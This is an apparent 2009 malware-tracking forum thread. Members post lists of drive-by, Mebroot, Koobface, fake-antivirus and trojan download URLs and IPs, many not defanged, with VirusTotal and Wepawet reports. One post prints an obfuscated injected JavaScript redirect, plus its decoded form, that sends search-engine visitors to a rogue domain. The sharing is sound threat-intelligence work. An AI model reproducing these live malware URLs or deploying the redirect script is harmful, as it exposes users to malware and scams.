VirusTotal (http://www.virustotal.com/analisis/ad7c98b2bcc7454278e9b89cdce1962c)
VirusTotal (http://www.virustotal.com/analisis/164799816ed1a0455861268b3176bcc8)
VirusTotal (http://www.virustotal.com/analisis/e57ffc5b955bce7a44a1f410d2b0e9bf)

60.173.10.53
Code: [Select]
hxxp://ipshougou.com/down/qqma.exe
Registrant: phyto, phyto  (support@ tongyong.net)
VirusTotal (http://www.virustotal.com/analisis/2f0359e1a9c783731865f01544a69c62)
Title: Re: daily something......
Post by: CM_MWR on May 12, 2009, 08:09:50 am
Drivebys

Code: [Select]
http://sdfv-programs.com/file.exe
http://wtopcompany.ru/cms/load.php
http://bdsm-movies.info/33/load.php
http://p0rn-movies.com/77/load.php
http://clicks100.ru/cms/index.php
http://clicks100.ru/cms/load.php?id=0
http://clicks100.ru/tmp/in.php?i=20661JNE1C4793&o=2
http://clicks100.ru/top100/iframe.php
http://beelposttraning.ru/s/default.cgi
http://beelposttraning.ru/s/in.cgi?3
http://dastrealworld.ru/dance.html
http://dastrealworld.ru/denunreal.html
http://dastrealworld.ru/maufeorl.html
http://dastrealworld.ru/ne/in.php
http://dwnld.offer-provider.com/secure/bec4d39b22049ff339f0b9e576c5299f/4a054ac1/vsm/vsm_free_setup.exe
http://dwnld.offer-provider.com/secure/ef6ca9ceb9b5bd94db5fa8bdd7889251/4a054035/vsm/vsm_free_setup.exe
http://internetnamestore.cn/cache/flash.swf
http://internetnamestore.cn/cache/readme.pdf
http://internetnamestore.cn/in.cgi?income23
http://internetnamestore.cn/in.cgi?income27
http://internetnamestore.cn/index.php
http://internetnamestore.cn/load.php?id=0
http://internetnamestore.cn/load.php?id=8
http://operative.cc/liveinternet/index.php
http://operative.cc/liveinternet/load.php?id=4679
http://operative.cc/liveinternet/pdf.php?id=4679
http://teyrebuf.cn/nuc/%E0%AC%8B%E0%AC%8BAAAAAAAAAAAAAAAAAAAAAAAAA
http://teyrebuf.cn/nuc/exe.php
http://teyrebuf.cn/nuc/index.php
http://teyrebuf.cn/nuc/spl/pdf.pdf
http://teyrebuf.cn/s/in.cgi?10
http://updateserver.info/cmp/controller.php?&ver=8&uid=dc2335ef&aid=astakiller&adm=adm&inst=1&br=IEXPLORE.EXE&os=XPSP2
http://updateserver.info/loads/astakiller.dll
http://zone2tech.info/skp66.exe

Mebroot

Code: [Select]
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe

Misc

Code: [Select]
http://www.dofulfill.info/Packer.dll
http://www.dofulfill.info/TRSOCR.dat
http://www.dofulfill.info/TRSOCR.ini
http://www.dofulfill.info/TRSOCR.dll
http://www.dofulfill.info/AdvOcr.dll
http://www.casadosrelojoeiros.com.br/Imagens/lo.jpg
http://www.onlyfreegames.net/screen41.jpg
http://www.onlyfreegames.net/screen42.jpg
http://61.19.252.95/apaches.gif
http://61.19.252.95/apachew.gif
http://866muma.3322.org/csru.exe
http://866muma.3322.org/csrb.exe
http://866muma.3322.org/csrx.exe
http://866muma.3322.org/csrp.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/kill.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/1.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/2.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/3.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/4.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/5.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/6.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/7.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/8.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/9.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/10.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/11.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/12.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/13.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/14.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/15.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/16.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/17.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/18.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/19.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/20.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/21.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/22.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/23.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/24.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/25.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/26.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/27.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/28.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/29.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/30.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/31.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/32.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/33.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/b.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/c.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/d.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/e.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/f.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/g.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/h.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/45.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/46.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/47.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/48.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/49.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/51.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/i.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/j.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/k.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/cap.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/m.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/hun.dll
http://down.aqbo.cn/soft/tool/%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%B8%8B%E8%BD%BD13354.exe
http://f1.hf3y5.com/1/AcX.exe
http://f1.hf3y5.com/9/AcX.exe
http://d1.hf3y5.com/1/AcX.exe
http://h1.dgfg4.com/01/AeX.exe
http://h1.dgfg4.com/02/AeX.exe
http://h1.dgfg4.com/03/AeX.exe
http://h1.dgfg4.com/04/AeX.exe
http://h1.dgfg4.com/06/AeX.exe
http://h1.dgfg4.com/07/AeX.exe
http://h1.dgfg4.com/08/AeX.exe
http://h1.dgfg4.com/09/AeX.exe
http://h1.dgfg4.com/10/AeX.exe
http://h1.dgfg4.com/11/AeX.exe
http://h1.dgfg4.com/12/AeX.exe
http://h1.dgfg4.com/13/AeX.exe
http://h1.dgfg4.com/14/AeX.exe
http://h1.dgfg4.com/15/AeX.exe
http://h1.dgfg4.com/16/AeX.exe
http://h1.dgfg4.com/17/AeX.exe
http://h1.dgfg4.com/18/AeX.exe
http://h1.dgfg4.com/20/AeX.exe
http://h1.dgfg4.com/21/AeX.exe
http://www.ppggg.com.cn/www.exe
http://www.ppppg.com.cn/www.exe
http://www.pppph.com.cn/www.exe
http://www.ppppj.com.cn/www.exe
http://exe316.com/xiao/111.exe
http://exe316.com/xiao/aa14.exe
http://exe316.com/xiao/aa18.exe
http://exe316.com/xiao/aa28.exe
http://exe316.com/xiao/aa33.exe
http://gm.adsl8899.cn/nl34.exe
http://gm.adsl8899.cn/nl37.exe
http://gm.adsl8899.cn/nl38.exe
http://gm.adsl8899.cn/nl40.exe
http://up.cj-vv.cn:889/up1/up.exe
http://u2.ovfr6.com/lmm/S15.exe
http://u2.ovfr6.com/lmm/S16.exe
http://u2.ovfr6.com/lmm/S21.exe
http://u2.ovfr6.com/lmm/S01.exe
http://u3.ovfr6.com/lmm/M33.exe
http://u3.ovfr6.com/lmm/M37.exe
http://u3.ovfr6.com/lmm/M15.exe
http://u3.ovfr6.com/lmm/M24.exe
http://u3.ovfr6.com/lmm/M02.exe
http://u2.ovfr6.com/lmm/S13.exe
http://u2.ovfr6.com/lmm/S17.exe
http://u2.ovfr6.com/lmm/S20.exe
http://u2.ovfr6.com/lmm/S11.exe
http://u2.ovfr6.com/lmm/S02.exe
http://u9.ovfr6.com/cjj/a1.exe
http://u9.ovfr6.com/cjj/a2.exe
http://u9.ovfr6.com/cjj/a8.exe
http://u9.ovfr6.com/cjj/a6.exe
http://u9.ovfr6.com/cjj/a9.exe
http://u9.ovfr6.com/cjj/a10.exe
http://u9.ovfr6.com/cjj/sb.exe
http://u9.ovfr6.com/ttt/01/01.exe
http://adimsceibh.com/progs/royyl/lvreefo.php
http://bddanhdnfl.net/progs/royyl/lvreefo.php
http://adimsceibh.com/progs/royyl/yhrrrrsfob
http://bddanhdnfl.net/progs/royyl/yhrrrrsfob
http://aaqkweoslz.com/progs/royyl/clmvviwj.php
http://aaqkweoslz.com/progs/royyl/cyiivvvjjw.php
http://aaqkweoslz.com/progs/royyl/ggcqqdde.php
http://aaqkweoslz.com/progs/royyl/kqddj.php
http://aaqkweoslz.com/progs/royyl/lvreefo.php
http://aaqkweoslz.com/progs/royyl/wspcpq.php
http://aaqkweoslz.com/progs/royyl/yhrrrrsfob
http://adimsceibh.com/progs/royyl/clmvviwj.php
http://adimsceibh.com/progs/royyl/cyiivvvjjw.php
http://adimsceibh.com/progs/royyl/ggcqqdde.php
http://adimsceibh.com/progs/royyl/kqddj.php
http://adimsceibh.com/progs/royyl/lvreefo.php
http://adimsceibh.com/progs/royyl/wspcpq.php
http://adimsceibh.com/progs/royyl/yhrrrrsfob
http://bazrvxedfe.net/aasuper0.php
http://bazrvxedfe.net/aasuper1.php
http://bazrvxedfe.net/aasuper2.php
http://bazrvxedfe.net/aasuper3.php
http://bddanhdnfl.net/aasuper0.php
http://bddanhdnfl.net/aasuper1.php
http://bddanhdnfl.net/aasuper2.php
http://bddanhdnfl.net/aasuper3.php
http://bhlmxnopqc.net/loaderadv563.exe
http://beelposttraning.ru/s/default.cgi
http://beelposttraning.ru/s/in.cgi?3
http://aksajans.com/1/6244.exe
http://aksajans.com/1/nfr.exe
http://aksajans.com/1/pp.06.exe
http://www.361safae.cn/img/sri1.gif
http://www.361safae.cn/img/sri2.gif
http://www.361safae.cn/img/sri3.gif
http://www.361safae.cn/img/sri4.gif
http://www.361safae.cn/img/sri5.gif
http://www.361safae.cn/img/sri6.gif
http://www.361safae.cn/img/sri7.gif
http://www.361safae.cn/img/sri8.gif
http://www.361safae.cn/img/sri9.gif
http://jump1.info/xxx.exe
http://xxx.host800.com/xxx.exe
http://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg http://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
http://pictureswall.com/werber/b0f/216.jpg
http://89.149.227.200/item/1090.exe
http://89.149.227.200/item/1091.exe
http://89.149.227.200/item/1092.exe
http://89.149.227.200/item/1093.exe
http://89.149.227.200/item/1094.exe
http://89.149.227.200/item/1095.exe
http://89.149.227.200/item/1096.exe
http://89.149.227.200/item/1097.exe
http://89.149.227.200/item/1098.exe
http://89.149.227.200/item/1099.exe

Title: Re: daily something......
Post by: CkreM on May 12, 2009, 08:57:51 am
Mebroot
Code: [Select]
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe

hamm,they changed thier way of infection again?
Title: Re: daily something......
Post by: sursmurf on May 12, 2009, 10:47:20 am
Code: [Select]
hXXp://hugetopnano.cn:8080/index.php
downloads

flash.swf
http://www.virustotal.com/analisis/6a7c462458c96cc099cfb7e340e15562

readme.pdf
http://www.virustotal.com/analisis/cfc979bd7744a91c5f444c8f4c0375e2



 
Title: Re: daily something......
Post by: CkreM on May 12, 2009, 02:34:13 pm
KoobFace:
Code: [Select]
71.202.219.18/setup.exe
208.97.2.97/setup.exe
Trojan:
Code: [Select]
yourelitehosting.ru/taskmgr.exehttp://www.virustotal.com/analisis/4b38b6888024000227a834d65b612365
Trojan:
Code: [Select]
5file.ru/vkphoto.exe http://www.virustotal.com/analisis/b4c968b1eb1f4fa95fa9eca46b09adeb
Trojan:
Code: [Select]
bureau.co.il/web/system.exehttp://www.virustotal.com/analisis/31e365b7f7c555b50d752a9eb118ce1a

Fake AV:
Code: [Select]
adware-help.com/promo/anti-virus-1.php?uid=70e191e0aaeac213213a62e4c05c9977the downloaded file:
Code: [Select]
installz.cn/stubfiles/70e19.exehttp://www.virustotal.com/analisis/b18edcbad2b207e305d789afb32cd4e6
Title: Re: daily something......
Post by: CM_MWR on May 12, 2009, 11:28:56 pm
Quote
hamm,they changed thier way of infection again?

Is strange yes, not sure what to make of it , see the iframes launch but nothing happens, then I can fetch binary locally using a direct link.

Maybe they know who i am by now.  :'(
Title: Re: daily something......
Post by: CkreM on May 13, 2009, 03:04:42 am
redirects to rogue:
Code: [Select]
gorankscan.com
Fake AV:
Code: [Select]
scanlux4.info
pornproductions09.com/scan/?id=268
and the d/l file:
pornproductions09.net/codec.exe
http://www.virustotal.com/analisis/51f9f528c0444f84faa229177660ed09

Mebroot:
Code: [Select]
hiyuxngvif.com/cgi-bin/index.cgi?dxhttp://wepawet.cs.ucsb.edu/view.php?hash=8cadb9cae57538f219069c6cb2d44555&t=1242183318&type=js
Title: Re: daily something......
Post by: michajp on May 13, 2009, 03:53:15 pm
While checking some old LuckySploit URL, the following popped up instead:

Code: [Select]
hxxp://addobeflashplayer.net/update/?promoid=FbU9dTs
hxxp://addobeflashplayer.net/update/?promoid=Ve8Tnv4

With installer at:
Code: [Select]
hxxp://addobeflashplayer.net/get/flashplayer/current/install_flash_player.exe
http://www.virustotal.com/analisis/3185d068ff2871765328dcdc86d7affc
Title: Re: daily something......
Post by: CkreM on May 14, 2009, 05:55:07 am
Koobface:
Code: [Select]
75.137.70.87/setup.exe
174.0.8.174/setup.exe
http://www.virustotal.com/analisis/06202d4e1ceb674f95435d05bcc6149f

Exploit/trojan:
Code: [Select]
luks5.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=c7a0e50c37e35c290324455c17b4b27e&t=1241763932&type=js

Exploit/trojan( wepawet gives invalid hostname)
Code: [Select]
usacaaugb.cn/life/index.phpPDF anlysis: http://wepawet.iseclab.org/view.php?hash=711a0cc4d481aa078c161179779310f1&type=js
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 10:19:45 am
exploits
Code: [Select]
rogkadej.cn/nuc/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=76a617d6921697f36d5d08f5fe163908&t=1242296838&type=js

trojan
Code: [Select]
rogkadej.cn/nuc/exe.phphttp://www.virustotal.com/analisis/be735f15770e8e06ebac50ec1bfafd40 7/40
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 11:54:38 am
redirect to exploits
Code: [Select]
bigbestfind.cn:8080/ts/in.cgi?pepsi4
hugepremium.cn:8080/ts/in.cgi?pepsi5
thebestyoucanfind.cn:8080/ts/in.cgi?pepsi3
http://wepawet.cs.ucsb.edu/view.php?hash=e95003549c9b2d9c5cc9388f2056d9bc&t=1242302241&type=js
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
http://wepawet.iseclab.org/view.php?hash=8e897a5695627f956885238acabfff04&t=1242296961&type=js

exploit
Code: [Select]
bigtopcabaret.cn:8080/index.phphttp://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850

redirects to the already known autobestwestern.cn
formerly hosted at Zlkon and Eurohost LLC
Code: [Select]
autobestwestern.cn:8080/load.php?id=8http://www.virustotal.com/analisis/77e676047adcaeeb5b32187f346de431 9/41
Title: Re: daily something......
Post by: sparsha on May 14, 2009, 07:20:35 pm
Code: [Select]
http://internetsecuritymetrics.com/hitin.php?land=30&affid=01986
http://videoporntrue.net/pcdef.exe
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 09:48:12 pm
Code: [Select]
www.loshaqe.com/sb.exehttp://www.virustotal.com/analisis/75e4162cf4b32e95418e9c9cb087f647 5/40
http://www.threatexpert.com/report.aspx?md5=3f451779cfd0dc44f54b8b10b658749f

Code: [Select]
www.loshaqe.com/ret.exehttp://www.virustotal.com/analisis/bea1ceb55fc01d3abc1c206f7aae4a31 14/39

downloader for DarkGT/IframeDollar
Code: [Select]
www.loshaqe.com/ins.exe
http://www.virustotal.com/analisis/26120869a3d862b46bf64e769f0fc32b 25/40

Code: [Select]
www.loshaqe.com/eg.exe
http://www.virustotal.com/analisis/a05691e95c2b074300ca8e075a69853b 11/40



Title: Re: daily something......
Post by: CkreM on May 15, 2009, 03:16:58 am
Koobface:
Code: [Select]
71.8.59.249/setup.exeTrojan:
Code: [Select]
vexpen.jino.ru/file/bot.exehttp://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a

Fake AV:
Code: [Select]
antvirushelpv1.com(download link aint working atm but will work soon i guess..)

Code: [Select]
securityhelpcenter.com/1/  (currently only have a link to the fake payment site at:
Code: [Select]
live-payment-system.com/buy.php?nh=1&id=
Title: Re: daily something......
Post by: MysteryFCM on May 15, 2009, 03:29:06 am
http://antvirushelpv1.com/download.php?id=2004

;)

Downloads: Install_2004.exe (132K)

Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;

qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm

You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));

Which decodes to;

Code: [Select]
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}

window.onFocus = f()

/edit

http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
Title: Re: daily something......
Post by: CkreM on May 15, 2009, 04:00:57 am
i actually can download it directly(
Code: [Select]
http://antvirushelpv1.com/download.php?id=2004)
Title: Re: daily something......
Post by: MysteryFCM on May 15, 2009, 04:09:22 am
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
Title: Re: daily something......
Post by: CkreM on May 15, 2009, 05:55:27 am
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)

 ;D
Title: Re: daily something......
Post by: CkreM on May 18, 2009, 03:37:50 am
Redirects to exploits:
Code: [Select]
popyodiw.cn/s/in.cgi?10Koobface:
Code: [Select]
123.199.89.28/setup.exeTrojan:
Code: [Select]
ji-u.cn/506.exehttp://www.virustotal.com/analisis/9c37779c08a666084c8088a42b44bbf6
Trojan:
Code: [Select]
claremontfinance.org/voland.exehttp://www.virustotal.com/analisis/970e0653980bb5313e6f9bbf82b32cc7
Trojan:
Code: [Select]
photo-host.in/new/exe/5555.exehttp://www.virustotal.com/analisis/bc8cb44f6b8046208e130186e4b78098
Trojan:
Code: [Select]
091809.ru/main_.exehttp://www.virustotal.com/analisis/d82a419082bfcf5c716bb6388f3c9ad1
Trojan:
Code: [Select]
buzizoo2.com/15.05-fuck.exehttp://www.virustotal.com/analisis/b42234e7210ce0192855eb43c3121b49
Trojan:
Code: [Select]
213.171.222.30/codec.exehttp://www.virustotal.com/analisis/14e090fe72f0114a4181d7d0d1b5b8fd
Title: Re: daily something......
Post by: SysAdMini on May 18, 2009, 11:51:34 am
exploits
Code: [Select]
numbersbulk.cn/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=ac1e4c06e172e7e6d75c8ac4c7ebb81d&t=1242647454&type=js

trojan
Code: [Select]
numbersbulk.cn/load.php?id=5http://www.virustotal.com/analisis/1b81c4c3f26c3b88d3721b61b0fe8f14 7/40
Title: Re: daily something......
Post by: CkreM on May 19, 2009, 06:25:21 am
Exploit/trojan:
Code: [Select]
pimpalas.cn/yespdf/index.phphttp://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js

Redirect to fake AV:
Code: [Select]
gogenscan.com
gozonescan.com
Fake AV:
Code: [Select]
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
Title: Re: daily something......
Post by: SysAdMini on May 19, 2009, 11:50:56 am
Code: [Select]
pearch.net/in.cgi?7
redirects to
Code: [Select]
europpc.com/search.php?iw=1&links=
links redirect to
Code: [Select]
wplstr.net/in.cgi?20
redirects to fake system check
Code: [Select]
systemstabilityscan.com/5
starts download
Code: [Select]
http://adioro.com/download.php?aid=5
redirects to
Code: [Select]
dl1.adioro.com/get.php?track_id=5
downloads
Code: [Select]
dl1.adioro.com/distribs/5/registryoptimizer.exehttp://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 03:52:16 pm
72.47.253.37

redirects to exploits:
Code: [Select]
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet (http://wepawet.iseclab.org/view.php?hash=ebb1fe9522a585973be68f770635d2dd&t=1242748332&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1546ed48bdf651718cfd0174a82b6efb&t=1242685229&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af9e734c0b248533c0f9075629d7f628&t=1242687499&type=js)
The latest has no report (too many submissions for wepawet since hours)
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 04:11:26 pm
redirects to exploits
91.212.41.119
Code: [Select]
hxxp://silzefos.cn/s/in.cgi?13
Wepawet (http://wepawet.iseclab.org/view.php?hash=ac168dc0c36f802d46ca35394f32d439&t=1242719638&type=js)
Registrant: Meng Qun / janglkd@ yeah.net

exploits / trojan
221.5.74.52
Code: [Select]
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com

Wepawet (http://wepawet.iseclab.org/view.php?hash=c813e5a5f4a61be58a0e14d1d805d78e&t=1242583611&type=js) (exploit)

VirusTotal (http://www.virustotal.com/analisis/664aeb722b7908da6cbd8d75c472feb2) (flash) - 3/39 (7.69%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=349deac830735bacff1d9d14c159498f&type=js) (flash)

VirusTotal (http://www.virustotal.com/analisis/9153dbcad1da90126ef4cb18b2507693) (pdf) - 7/39 (17.95%)
VirusTotal (http://www.virustotal.com/analisis/fdbf2a14b8135705d740bc9ffa931074) (exe) - 3/39 (7.69%)

